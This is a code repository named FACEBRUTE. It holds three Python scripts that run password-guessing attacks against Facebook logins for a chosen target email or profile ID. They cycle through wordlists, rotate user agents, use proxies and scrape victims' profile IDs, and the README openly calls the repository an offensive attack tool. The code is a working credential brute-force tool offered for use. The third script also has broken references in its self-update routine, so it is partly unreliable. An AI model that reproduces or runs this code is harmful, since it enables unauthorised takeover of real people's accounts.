├── FBRUTE.py ├── FBRUTE2.py ├── FBRUTE3.py ├── README.md ├── core └── version.txt ├── passwords.txt └── setup /FBRUTE.py: -------------------------------------------------------------------------------- 1 | import os.path 2 | import requests 3 | from bs4 import BeautifulSoup 4 | import sys 5 | 6 | if sys.version_info[0] != 3: 7 | print('''\t--------------------------------------\n\t\tREQUIRED PYTHON 3.x\n\t\tinstall and try: python3 8 | fb.py\n\t--------------------------------------''') 9 | sys.exit() 10 | 11 | PASSWORD_FILE = "passwords.txt" 12 | MIN_PASSWORD_LENGTH = 6 13 | POST_URL = 'https://www.facebook.com/login.php' 14 | HEADERS = { 15 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36', 16 | } 17 | PAYLOAD = {} 18 | COOKIES = {} 19 | 20 | 21 | def create_form(): 22 | form = dict() 23 | cookies = {'fr': '0ZvhC3YwYm63ZZat1..Ba0Ipu.Io.AAA.0.0.Ba0Ipu.AWUPqDLy'} 24 | 25 | data = requests.get(POST_URL, headers=HEADERS) 26 | for i in data.cookies: 27 | cookies[i.name] = i.value 28 | data = BeautifulSoup(data.text, 'html.parser').form 29 | if data.input['name'] == 'lsd': 30 | form['lsd'] = data.input['value'] 31 | return form, cookies 32 | 33 | 34 | def is_this_a_password(email, index, password): 35 | global PAYLOAD, COOKIES 36 | if index % 10 == 0: 37 | PAYLOAD, COOKIES = create_form() 38 | PAYLOAD['email'] = email 39 | PAYLOAD['pass'] = password 40 | r = requests.post(POST_URL, data=PAYLOAD, cookies=COOKIES, headers=HEADERS) 41 | if 'Find Friends' in r.text or 'security code' in r.text or 'Two-factor authentication' in r.text or "Log Out" in r.text: 42 | open('temp', 'w').write(str(r.content)) 43 | print('\npassword found is: ', password) 44 | return True 45 | return False 46 | 47 | 48 | if __name__ == "__main__": 49 | print('\n---------- Welcome To FaceBrute ----------\n') 50 | if not os.path.isfile(PASSWORD_FILE): 51 | print("Password file is not exist: ", PASSWORD_FILE) 52 | sys.exit(0) 53 | password_data = open(PASSWORD_FILE, 'r').read().split("\n") 54 | print("Password file selected: ", PASSWORD_FILE) 55 | email = input('Enter Email/Username to target: ').strip() 56 | for index, password in zip(range(password_data.__len__()), password_data): 57 | password = password.strip() 58 | if len(password) < MIN_PASSWORD_LENGTH: 59 | continue 60 | print("Trying password [", index, "]: ", password) 61 | if is_this_a_password(email, index, password): 62 | break 63 | -------------------------------------------------------------------------------- /FBRUTE2.py: -------------------------------------------------------------------------------- 1 | import time 2 | import sys 3 | 4 | if sys.version_info[0] !=2: 5 | print('''-------------------------------------- 6 | REQUIRED PYTHON 2.x 7 | use: python fb2.py 8 | -------------------------------------- 9 | ''') 10 | sys.exit() 11 | 12 | post_url='https://www.facebook.com/login.php' 13 | headers = { 14 | 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36', 15 | } 16 | 17 | try: 18 | import mechanize 19 | import urllib2 20 | browser = mechanize.Browser() 21 | browser.addheaders = [('User-Agent',headers['User-Agent'])] 22 | browser.set_handle_robots(False) 23 | except: 24 | print('\n\tPlease install mechanize.\n') 25 | sys.exit() 26 | 27 | print('\n---------- Welcome To FaceBrute ----------\n') 28 | file=open('passwords.txt','r') 29 | 30 | email=str(raw_input('Enter Email/Username : ').strip()) 31 | 32 | print ("\nTarget Email ID : ",email) 33 | print "\nTrying Passwords from list ..." 34 | 35 | i=0 36 | while file: 37 | passw=file.readline().strip() 38 | i+=1 39 | if len(passw) < 6: 40 | continue 41 | print str(i) +" : ",passw 42 | response = browser.open(post_url) 43 | try: 44 | if response.code == 200: 45 | browser.select_form(nr=0) 46 | browser.form['email'] = email 47 | browser.form['pass'] = passw 48 | response = browser.submit() 49 | response_data = response.read() 50 | if 'Find Friends' in response_data or 'Two-factor authentication' in response_data or 'security code' in response_data: 51 | print('Your password is : ',passw) 52 | break 53 | except: 54 | print('\nSleeping for time : 5 min\n') 55 | time.sleep(300) 56 | -------------------------------------------------------------------------------- /FBRUTE3.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket, sys, os, re, random, optparse, time, io 4 | if sys.version_info.major <= 2:import httplib 5 | else:import http.client as httplib 6 | 7 | ## COLORS ############### 8 | wi="\033[1;37m" #>>White# 9 | rd="\033[1;31m" #>Red # 10 | gr="\033[1;32m" #>Green # 11 | yl="\033[1;33m" #>Yellow# 12 | ######################### 13 | os.system("cls||clear") 14 | def write(text): 15 | sys.stdout.write(text) 16 | sys.stdout.flush() 17 | 18 | versionPath = os.path.join("core", "version.txt") 19 | 20 | errMsg = lambda msg: write(rd+"\n["+yl+"!"+rd+"] Error: "+yl+msg+rd+ " !!!\n"+wi) 21 | 22 | try:import requests 23 | except ImportError: 24 | errMsg("[ requests ] module is missing") 25 | print(" [*] Please Use: 'pip install requests' to install it :)") 26 | sys.exit(1) 27 | try:import mechanize 28 | except ImportError: 29 | errMsg("[ mechanize ] module is missing") 30 | print(" [*] Please Use: 'pip install mechanize' to install it :)") 31 | sys.exit(1) 32 | 33 | class FaceBoom(object): 34 | 35 | 36 | def __init__(self): 37 | self.useProxy = None 38 | self.br = mechanize.Browser() 39 | self.br.set_handle_robots(False) 40 | self.br._factory.is_html = True 41 | self.br.addheaders=[('User-agent',random.choice([ 42 | 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) RockMelt/0.9.58.494 Chrome/11.0.696.71 Safari/534.24', 43 | 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36', 44 | 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.54 Safari/535.2', 45 | 'Opera/9.80 (J2ME/MIDP; Opera Mini/9.80 (S60; SymbOS; Opera Mobi/23.348; U; en) Presto/2.5.25 Version/10.54', 46 | 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.12 Safari/535.11', 47 | 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.6 (KHTML, like Gecko) Chrome/16.0.897.0 Safari/535.6', 48 | 'Mozilla/5.0 (X11; Linux x86_64; rv:17.0) Gecko/20121202 Firefox/17.0 Iceweasel/17.0.1']))] 49 | 50 | 51 | @staticmethod 52 | def check_proxy(proxy): 53 | proxies = {'https':"https://"+proxy, 'http':"http://"+proxy} 54 | proxy_ip = proxy.split(":")[0] 55 | try: 56 | r = requests.get('https://www.wikipedia.org',proxies=proxies, timeout=5) 57 | if proxy_ip==r.headers['X-Client-IP']: return True 58 | return False 59 | except Exception : return False 60 | 61 | 62 | @staticmethod 63 | def cnet(): 64 | try: 65 | socket.create_connection((socket.gethostbyname("www.google.com"), 80), 2) 66 | return True 67 | except socket.error:pass 68 | return False 69 | 70 | 71 | def get_profile_id(self, target_profile): 72 | try: 73 | print(gr+"\n["+wi+"*"+gr+"] geting target Profile Id... please wait"+wi) 74 | idre = re.compile('(?<="userID":").*?(?=")') 75 | con = requests.get(target_profile).text 76 | idis = idre.search(con).group() 77 | print(wi+"\n["+gr+"+"+wi+"]"+gr+" Target Profile"+wi+" ID: "+yl+idis+wi) 78 | except Exception: 79 | errMsg("Please Check Your Victim's Profile URL") 80 | sys.exit(1) 81 | 82 | 83 | def login(self,target, password): 84 | 85 | try: 86 | self.br.open("https://facebook.com") 87 | self.br.select_form(nr=0) 88 | self.br.form['email']=target 89 | self.br.form['pass']= password 90 | self.br.method ="POST" 91 | if self.br.submit().get_data().__contains__(b'home_icon'):return 1 92 | elif "checkpoint" in self.br.geturl(): return 2 93 | return 0 94 | except(KeyboardInterrupt, EOFError): 95 | print(rd+"\n["+yl+"!"+rd+"]"+yl+" Aborting"+rd+"..."+wi) 96 | time.sleep(1.5) 97 | sys.exit(1) 98 | except Exception as e: 99 | print(rd+" Error: "+yl+str(e)+wi+"\n") 100 | time.sleep(0.60) 101 | 102 | 103 | def banner(self,target,wordlist,single_passwd): 104 | 105 | proxystatus = gr+self.useProxy+wi+"["+gr+"ON"+wi+"]" if self.useProxy else yl+"["+rd+"OFF"+yl+"]" 106 | print(gr+""" 107 | ================================== 108 | [---] """+wi+"""FACEBOOK BRUTEFORCE"""+gr+""" [---] 109 | ================================== 110 | [---] """+wi+""" FACEBOOK HACK """+gr+""" [---] 111 | ================================== 112 | [---] """+yl+"""CONFIG"""+gr+""" [---] 113 | ================================== 114 | [>] Target :> """+wi+target+gr+""" 115 | {}""".format("[>] Wordlist :> "+yl+str(wordlist) if not single_passwd else "[>] Password :> "+yl+str(single_passwd))+gr+""" 116 | [>] ProxyStatus :> """+str(proxystatus)+wi) 117 | if not single_passwd: 118 | print(gr+"""\ 119 | =================================="""+wi+""" 120 | [~] """+yl+"""Brute"""+rd+""" ForceATTACK: """+gr+"""Enabled """+wi+"""[~]"""+gr+""" 121 | ==================================\n"""+wi) 122 | else:print("\n") 123 | 124 | 125 | @staticmethod 126 | def updateFacebook_hack(): 127 | if not os.path.isfile(versionPath): 128 | errMsg("Unable to check for updates: please re-clone the script to fix this problem") 129 | sys.exit(1) 130 | write("[~] Checking for updates...\n") 131 | conn = httplib.HTTPSConnection("raw.githubusercontent.com") 132 | conn.request("GET", "/Oseid/Facebook_hack/master/core/version.txt") 133 | repoVersion = conn.getresponse().read().strip().decode() 134 | with open(versionPath) as vf: 135 | currentVersion = vf.read().strip() 136 | if repoVersion == currentVersion:write(" [*] The script is up to date!\n") 137 | else: 138 | print(" [+] An update has been found ::: Updating... ") 139 | conn.request("GET", "/Oseid/FaceBook_hack/master/facebook_hack.py") 140 | newCode = conn.getresponse().read().strip().decode() 141 | with open("facebook_hack.py", "w") as facebook_hackScript: 142 | faceBook_hackScript.write(newCode) 143 | with open(versionPath, "w") as ver: 144 | ver.write(repoVersion) 145 | write(" [+] Successfully updated :)\n") 146 | 147 | parse = optparse.OptionParser(wi+""" 148 | Usage: python facebook_hack.py [OPTIONS...] 149 | ------------- 150 | OPTIONS: 151 | | 152 | |-------- 153 | | -t [OR] ::> Specify target Email [OR] Target Profile ID 154 | |-------- 155 | | -w ::> Specify Wordlist File Path 156 | |-------- 157 | | -s ::> Specify Single Password To Check 158 | |-------- 159 | | -p ::> Specify HTTP/S Proxy (Optional) 160 | |-------- 161 | | -g ::> Specify Target Facebook Profile URL For Get HIS ID 162 | |-------- 163 | | -u/--update ::> Update FaceBook_hack Script 164 | ------------- 165 | Examples: 166 | | 167 | |-------- 168 | | python facebook_hack.py -t Victim@gmail.com -w /usr/share/wordlists/rockyou.txt 169 | |-------- 170 | | python facebook_hack.py -t 100023298078780 -w C:\\Users\\Me\\Desktop\\wordlist.txt 171 | |-------- 172 | | python facebook_hack.py -t Victim@yahoo.com -w D:\\wordlist.txt -p 137.567.471.245:4356 173 | |-------- 174 | | python facebook_hack.py -t Victim@gmail.com -s 1234567 175 | |-------- 176 | | python facebook_hack.py -g https://www.facebook.com/Victim-Profile 177 | |-------- 178 | """) 179 | 180 | 181 | def Main(): 182 | parse.add_option("-t","--target",'-T','--TARGET',dest="target",type="string", 183 | help="Specify Target Email or ID") 184 | parse.add_option("-w","--wordlist",'-W','--WORDLIST',dest="wordlist",type="string", 185 | help="Specify Wordlist File ") 186 | parse.add_option("-s","--single","--S","--SINGLE",dest="single",type="string", 187 | help="Specify Single Password To Check it") 188 | parse.add_option("-p","-P","--proxy","--PROXY",dest="proxy",type="string", 189 | help="Specify HTTP/S Proxy to be used") 190 | parse.add_option("-g","-G","--getid","--GETID",dest="url",type="string", 191 | help="Specify TARGET FACEBOOK PROFILE URL to get his ID") 192 | parse.add_option("-u","-U","--update","--UPDATE", dest="update", action="store_true", default=False) 193 | (options,args) = parse.parse_args() 194 | faceboom = FaceBoom() 195 | target = options.target 196 | wordlist = options.wordlist 197 | single_passwd = options.single 198 | proxy = options.proxy 199 | target_profile = options.url 200 | update = options.update 201 | opts = [target,wordlist,single_passwd, proxy, target_profile, update] 202 | if any(opt for opt in opts): 203 | if not faceboom.cnet(): 204 | errMsg("Please Check Your Internet Connection") 205 | sys.exit(1) 206 | if update: 207 | facebook_hack.updateFaceBook_hack() 208 | sys.exit(1) 209 | elif target_profile: 210 | faceboom.get_profile_id(target_profile) 211 | sys.exit(1) 212 | elif wordlist or single_passwd: 213 | if wordlist: 214 | if not os.path.isfile(wordlist): 215 | errMsg("Please check Your Wordlist Path") 216 | sys.exit(1) 217 | if single_passwd: 218 | if len(single_passwd.strip()) < 6: 219 | errMsg("Invalid Password") 220 | print("[!] Password must be at least '6' characters long") 221 | sys.exit(1) 222 | if proxy: 223 | if proxy.count(".") != 3: 224 | errMsg("Invalid IPv4 ["+rd+str(proxy)+yl+"]") 225 | sys.exit(1) 226 | print(wi+"["+yl+"~"+wi+"] Connecting To "+wi+"Proxy[\033[1;33m {} \033[1;37m]...".format(proxy if not ":" in proxy else proxy.split(":")[0])) 227 | final_proxy = proxy+":8080" if not ":" in proxy else proxy 228 | if faceboom.check_proxy(final_proxy): 229 | faceboom.useProxy = final_proxy 230 | faceboom.br.set_proxies({'https':faceboom.useProxy, 'http':faceboom.useProxy}) 231 | print(wi+"["+gr+"Connected"+wi+"]") 232 | else: 233 | errMsg("Connection Failed") 234 | errMsg("Unable to connect to Proxy["+rd+str(proxy)+yl+"]") 235 | sys.exit(1) 236 | 237 | faceboom.banner(target,wordlist,single_passwd) 238 | loop = 1 if not single_passwd else "~" 239 | if single_passwd: 240 | passwords = [single_passwd] 241 | else: 242 | with io.open(wordlist, 'r', errors='replace') as f: 243 | passwords = f.readlines() 244 | for passwd in passwords: 245 | passwd = passwd.strip() 246 | if len(passwd) <6:continue 247 | write(wi+"["+yl+str(loop)+wi+"] Trying Password[ {"+yl+str(passwd)+wi+"} ]") 248 | retCode = faceboom.login(target, passwd) 249 | if retCode: 250 | sys.stdout.write(wi+" ==> Login"+gr+" Success\n") 251 | print(wi+"========================="+"="*len(passwd)+"======") 252 | print(wi+"["+gr+"+"+wi+"] Password [ "+gr+passwd+wi+" ]"+gr+" Is Correct :)") 253 | print(wi+"========================="+"="*len(passwd)+"======") 254 | if retCode == 2:print(wi+"["+yl+"!"+wi+"]"+yl+" Warning: This account use ("+rd+"2F Authentication"+yl+"):"+rd+" It's Locked"+yl+" !!!") 255 | break 256 | else: 257 | sys.stdout.write(yl+" ==> Login"+rd+" Failed\n") 258 | loop = loop + 1 if not single_passwd else "~" 259 | else: 260 | if single_passwd: 261 | print(yl+"\n["+rd+"!"+yl+"] Sorry: "+wi+"The Password[ "+yl+passwd+wi+" ] Is Not Correct"+rd+":("+yl+"!"+wi) 262 | print(gr+"["+yl+"!"+gr+"]"+yl+" Please Try Another password or Wordlist "+gr+":)"+wi) 263 | else: 264 | print(yl+"\n["+rd+"!"+yl+"] Sorry: "+wi+"I Can't Find The Correct Password In [ "+yl+wordlist+wi+" ] "+rd+":("+yl+"!"+wi) 265 | print(gr+"["+yl+"!"+gr+"]"+yl+" Please Try Another Wordlist. "+gr+":)"+wi) 266 | sys.exit(1) 267 | else: 268 | print(parse.usage) 269 | sys.exit(1) 270 | 271 | if __name__=='__main__': 272 | Main() 273 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ### FACEBRUTE 2 | ``` 3 | This ia an Offensive Bruteforce Attack Tool, Just For Educational Purpose Only 4 | ``` 5 | For Questions Telegram: https://t.me/HackBitGod Email Me: hackbitgod@gmail.com 6 | 7 | 8 | ## Install Requirements on any Linux Distribution 9 | ``` 10 | >> apt-get install git python3 python3-pip python python-pip 11 | ``` 12 | 13 | ## Run commands one by one 14 | ``` 15 | >> git clone https://github.com/Hack-BitGod/FACEBRUTE.git 16 | >> cd FACEBRUTE 17 | >> python3 -m pip install requests bs4 18 | >> python3 -m pip install mechanize 19 | >> python3 FBRUTE.py, python3 FBRUTE2.py or python3 FBRUTE3.py 20 | ``` 21 | 22 | 23 | 24 | -------------------------------------------------------------------------------- /core/version.txt: -------------------------------------------------------------------------------- 1 | 3.0.4.1 2 | -------------------------------------------------------------------------------- /setup: -------------------------------------------------------------------------------- 1 | #bin/python 2 | #code written by Alpha-HackGod 3 | 4 | pip install mechanize 5 | pkg install wget 6 | --------------------------------------------------------------------------------